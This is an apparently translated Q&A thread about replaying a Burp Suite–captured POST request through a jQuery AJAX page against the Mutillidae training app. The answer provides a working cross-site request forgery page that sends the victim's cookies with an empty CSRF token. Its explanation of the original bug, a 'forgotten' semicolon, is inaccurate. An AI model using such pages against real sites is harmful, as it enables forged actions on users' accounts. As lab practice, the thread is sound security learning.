Отправка POST-запроса с помощью AJAX, который перехватывается Burp Suite

Question

Я перехватил POST-запрос в Burp Suite и хочу отправить этот запрос вручную из JavaScript Ajax call.

Это мой запрос необработанный: Burp Suite - необработанный почтовый запрос

Я пытался отправить запрос POST так:

<!DOCTYPE html>
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script>
$.ajax({
    type: 'POST',
    url: 'http://10.10.20.103/mutillidae/index.php?page=add-to-your-blog.php',
    data: {
        'csrf-token': '',
        'blog_entry': 'post from ajax',
        'add-to-your-blog-php-submit-button': 'Save+Blog+Entry'
    };
});
</script>
</head>
<body>
</body>
</html>

Но я не мог справиться с этим. Где моя ошибка? Или как мне это сделать? Как я могу преобразовать необработанный запрос в запрос Ajax?

Спасибо!

Answer 1

Правильное решение:

<!DOCTYPE html>
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script>
$.ajax({
    method: 'POST',
    url: 'http://10.10.20.103/mutillidae/index.php?page=add-to-your-blog.php',
    data: {
        'csrf-token': '',
        'blog_entry': 'post from ajax',
        'add-to-your-blog-php-submit-button': 'Save+Blog+Entry'
    },
    xhrFields: {
       withCredentials: true
    }
});
</script>
</head>
<body>
</body>
</html>

Я забыл точку с запятой в конце закрывающей фигурной скобки поля данных. Кроме того, я должен добавить поле xhrFields для обхода файлов cookie.